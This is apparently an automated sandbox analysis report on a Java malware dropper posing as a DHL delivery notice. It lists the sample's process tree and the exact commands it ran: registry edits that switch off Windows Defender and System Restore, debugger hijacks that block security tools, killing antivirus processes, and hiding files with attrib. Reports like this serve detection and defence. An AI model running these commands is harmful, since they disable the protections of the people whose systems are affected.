PID 3288 wrote to memory of 4360	3288	java.exe	320
PID 3288 wrote to memory of 4360	3288	java.exe	320
PID 3988 wrote to memory of 4460	3988	cmd.exe	322
PID 3988 wrote to memory of 4460	3988	cmd.exe	322
PID 3288 wrote to memory of 4044	3288	java.exe	323
PID 3288 wrote to memory of 4044	3288	java.exe	323
PID 4044 wrote to memory of 4592	4044	cmd.exe	325
PID 4044 wrote to memory of 4592	4044	cmd.exe	325
PID 4044 wrote to memory of 4796	4044	cmd.exe	326
PID 4044 wrote to memory of 4796	4044	cmd.exe	326
PID 3288 wrote to memory of 4908	3288	java.exe	327
PID 3288 wrote to memory of 4908	3288	java.exe	327
PID 4908 wrote to memory of 4868	4908	cmd.exe	329
PID 4908 wrote to memory of 4868	4908	cmd.exe	329
PID 4908 wrote to memory of 4792	4908	cmd.exe	330
PID 4908 wrote to memory of 4792	4908	cmd.exe	330
PID 3288 wrote to memory of 2656	3288	java.exe	331
PID 3288 wrote to memory of 2656	3288	java.exe	331
PID 2656 wrote to memory of 1488	2656	cmd.exe	333
PID 2656 wrote to memory of 1488	2656	cmd.exe	333
PID 2656 wrote to memory of 4392	2656	cmd.exe	334
PID 2656 wrote to memory of 4392	2656	cmd.exe	334
PID 3288 wrote to memory of 5096	3288	java.exe	335
PID 3288 wrote to memory of 5096	3288	java.exe	335
PID 5096 wrote to memory of 5036	5096	cmd.exe	337
PID 5096 wrote to memory of 5036	5096	cmd.exe	337
PID 5096 wrote to memory of 4192	5096	cmd.exe	338
PID 5096 wrote to memory of 4192	5096	cmd.exe	338
PID 3288 wrote to memory of 4164	3288	java.exe	339
PID 3288 wrote to memory of 4164	3288	java.exe	339
PID 4164 wrote to memory of 4372	4164	cmd.exe	341
PID 4164 wrote to memory of 4372	4164	cmd.exe	341
PID 4164 wrote to memory of 4424	4164	cmd.exe	342
PID 4164 wrote to memory of 4424	4164	cmd.exe	342
PID 3288 wrote to memory of 4520	3288	java.exe	343
PID 3288 wrote to memory of 4520	3288	java.exe	343
PID 4520 wrote to memory of 4592	4520	cmd.exe	345
PID 4520 wrote to memory of 4592	4520	cmd.exe	345
PID 4520 wrote to memory of 4692	4520	cmd.exe	346
PID 4520 wrote to memory of 4692	4520	cmd.exe	346
PID 3288 wrote to memory of 4512	3288	java.exe	347
PID 3288 wrote to memory of 4512	3288	java.exe	347
PID 4512 wrote to memory of 4880	4512	cmd.exe	349
PID 4512 wrote to memory of 4880	4512	cmd.exe	349
PID 4512 wrote to memory of 4580	4512	cmd.exe	350
PID 4512 wrote to memory of 4580	4512	cmd.exe	350
PID 3288 wrote to memory of 4792	3288	java.exe	351
PID 3288 wrote to memory of 4792	3288	java.exe	351
PID 4792 wrote to memory of 3760	4792	cmd.exe	353
PID 4792 wrote to memory of 3760	4792	cmd.exe	353
PID 4792 wrote to memory of 1608	4792	cmd.exe	354
PID 4792 wrote to memory of 1608	4792	cmd.exe	354
PID 3288 wrote to memory of 1120	3288	java.exe	355
PID 3288 wrote to memory of 1120	3288	java.exe	355
PID 1120 wrote to memory of 1460	1120	cmd.exe	357
PID 1120 wrote to memory of 1460	1120	cmd.exe	357
PID 1120 wrote to memory of 4204	1120	cmd.exe	358
PID 1120 wrote to memory of 4204	1120	cmd.exe	358
PID 3288 wrote to memory of 4192	3288	java.exe	359
PID 3288 wrote to memory of 4192	3288	java.exe	359
PID 3288 wrote to memory of 4476	3288	java.exe	361
PID 3288 wrote to memory of 4476	3288	java.exe	361
PID 4192 wrote to memory of 4584	4192	cmd.exe	363
PID 4192 wrote to memory of 4584	4192	cmd.exe	363
PID 4192 wrote to memory of 4452	4192	cmd.exe	364
PID 4192 wrote to memory of 4452	4192	cmd.exe	364
PID 3288 wrote to memory of 5016	3288	java.exe	365
PID 3288 wrote to memory of 5016	3288	java.exe	365
PID 5016 wrote to memory of 1540	5016	cmd.exe	367
PID 5016 wrote to memory of 1540	5016	cmd.exe	367
PID 5016 wrote to memory of 1608	5016	cmd.exe	368
PID 5016 wrote to memory of 1608	5016	cmd.exe	368
PID 3288 wrote to memory of 5028	3288	java.exe	369
PID 3288 wrote to memory of 5028	3288	java.exe	369
PID 5028 wrote to memory of 4260	5028	cmd.exe	371
PID 5028 wrote to memory of 4260	5028	cmd.exe	371
PID 5028 wrote to memory of 4360	5028	cmd.exe	372
PID 5028 wrote to memory of 4360	5028	cmd.exe	372
PID 3288 wrote to memory of 4928	3288	java.exe	373
PID 3288 wrote to memory of 4928	3288	java.exe	373
PID 4928 wrote to memory of 4656	4928	cmd.exe	375
PID 4928 wrote to memory of 4656	4928	cmd.exe	375
PID 4928 wrote to memory of 4692	4928	cmd.exe	376
PID 4928 wrote to memory of 4692	4928	cmd.exe	376
PID 3288 wrote to memory of 380	3288	java.exe	377
PID 3288 wrote to memory of 380	3288	java.exe	377
PID 3288 wrote to memory of 4260	3288	java.exe	379
PID 3288 wrote to memory of 4260	3288	java.exe	379
PID 3288 wrote to memory of 3760	3288	java.exe	381
PID 3288 wrote to memory of 3760	3288	java.exe	381
PID 3288 wrote to memory of 4784	3288	java.exe	384
PID 3288 wrote to memory of 4784	3288	java.exe	384
PID 3288 wrote to memory of 4368	3288	java.exe	386
PID 3288 wrote to memory of 4368	3288	java.exe	386
PID 3288 wrote to memory of 5012	3288	java.exe	388
PID 3288 wrote to memory of 5012	3288	java.exe	388
PID 3288 wrote to memory of 1488	3288	java.exe	390
PID 3288 wrote to memory of 1488	3288	java.exe	390
PID 3288 wrote to memory of 380	3288	java.exe	392
PID 3288 wrote to memory of 380	3288	java.exe	392

Views/modifies file attributes 1 TTPs 8 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
3820	attrib.exe
912	attrib.exe
388	attrib.exe
1052	attrib.exe
1196	attrib.exe
2580	attrib.exe
3640	attrib.exe
3828	attrib.exe

C:\ProgramData\Oracle\Java\javapath\java.exe
java -jar "C:\Users\Admin\AppData\Local\Temp\NOTIFICA DI ARRIVO DHL_PDF.jar"
1⤵
- Loads dropped DLL
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3288
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3844
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3952
- - C:\Windows\System32\Wbem\WMIC.exe
    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3048
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3376
- - C:\Windows\System32\Wbem\WMIC.exe
    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3448
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h C:\Users\Admin\Oracle
  2⤵
  - Views/modifies file attributes
  PID:3640
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h +r +s C:\Users\Admin\.ntusernt.ini
  2⤵
  - Views/modifies file attributes
  PID:3828
- C:\Windows\SYSTEM32\attrib.exe
  attrib -s -r C:\Users\Admin\ujTBR\Desktop.ini
  2⤵
  - Drops desktop.ini file(s)
  - Views/modifies file attributes
  PID:3820
- C:\Windows\SYSTEM32\attrib.exe
  attrib +s +r C:\Users\Admin\ujTBR\Desktop.ini
  2⤵
  - Drops desktop.ini file(s)
  - Views/modifies file attributes
  PID:912
- C:\Windows\SYSTEM32\attrib.exe
  attrib -s -r C:\Users\Admin\ujTBR
  2⤵
  - Views/modifies file attributes
  PID:388
- C:\Windows\SYSTEM32\attrib.exe
  attrib +s +r C:\Users\Admin\ujTBR
  2⤵
  - Views/modifies file attributes
  PID:1052
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h C:\Users\Admin\ujTBR
  2⤵
  - Views/modifies file attributes
  PID:1196
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h +s +r C:\Users\Admin\ujTBR\NXtxm.class
  2⤵
  - Views/modifies file attributes
  PID:2580
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3332
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:64
    3⤵
    PID:1304
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:32
    3⤵
    PID:2020
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\ujTBR','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\ujTBR\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1112
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2748
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "1" /f
  2⤵
  PID:1976
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "UserAccountControlSettings.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:3028
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;.jar;" /f
  2⤵
  PID:1328
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Taskmgr.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3200
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_SZ /d "-" /f
  2⤵
  PID:360
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3760
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d "-" /f
  2⤵
  PID:3864
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3872
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f
  2⤵
  PID:1552
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2512
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3044
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f
  2⤵
  PID:2172
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2824
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "2" /f
  2⤵
  PID:2116
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "Taskmgr.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:3964
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2700
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall\OneDriveSetup.exe" /reg:64
    3⤵
    PID:3044
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall\OneDriveSetup.exe" /reg:32
    3⤵
    PID:3520
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d "1" /f
  2⤵
  PID:3996
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3960
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d "1" /f
  2⤵
  PID:1060
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3816
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:796
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  2⤵
  PID:604
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  PID:2696
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2580
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  2⤵
  PID:3864
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3032
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1316
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  2⤵
  PID:3148
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3200
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:964
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3560
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2824
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2116
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1008
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3144
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:796
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2616
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:64
    3⤵
    PID:3328
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:32
    3⤵
    PID:3148
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3820
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:64
    3⤵
    PID:1328
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:32
    3⤵
    PID:2740
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2128
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:64
    3⤵
    PID:4000
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:32
    3⤵
    PID:2692
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3920
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:64
    3⤵
    PID:1552
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:32
    3⤵
    PID:2804
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3052
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic /Node:localhost /Namespace:\\root\cimv2 Path Win32_PnpSignedDriver Get /Format:List
    3⤵
    PID:3960
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:3736
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3444
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:64
    3⤵
    PID:2740
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:32
    3⤵
    PID:1000
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3028
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:64
    3⤵
    PID:3812
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:32
    3⤵
    PID:3144
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2804
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:64
    3⤵
    PID:2740
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:32
    3⤵
    PID:1000
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2580
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:64
    3⤵
    PID:3640
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:32
    3⤵
    PID:1304
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2748
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:64
    3⤵
    PID:2740
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:32
    3⤵
    PID:1000
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3228
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:64
    3⤵
    PID:788
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:32
    3⤵
    PID:3864
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1200
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:64
    3⤵
    PID:3020
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:32
    3⤵
    PID:3976
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2740
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4124
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:64
    3⤵
    PID:4180
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:32
    3⤵
    PID:4200
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4220
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:64
    3⤵
    PID:4256
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:32
    3⤵
    PID:4280
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4304
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:64
    3⤵
    PID:4340
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:32
    3⤵
    PID:4360
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4380
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:64
    3⤵
    PID:4420
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:32
    3⤵
    PID:4448
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4468
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\ProPlusRetail - en-us" /reg:64
    3⤵
    PID:4504
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\ProPlusRetail - en-us" /reg:32
    3⤵
    PID:4524
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4544
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:64
    3⤵
    PID:4656
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:32
    3⤵
    PID:4692
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4560
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4732
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:64
    3⤵
    PID:4768
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:32
    3⤵
    PID:4792
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4816
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:64
    3⤵
    PID:4852
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:32
    3⤵
    PID:4872
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4892
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:64
    3⤵
    PID:4928
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:32
    3⤵
    PID:4948
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4968
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:64
    3⤵
    PID:5068
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:32
    3⤵
    PID:5100
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4988
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3472
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}" /reg:64
    3⤵
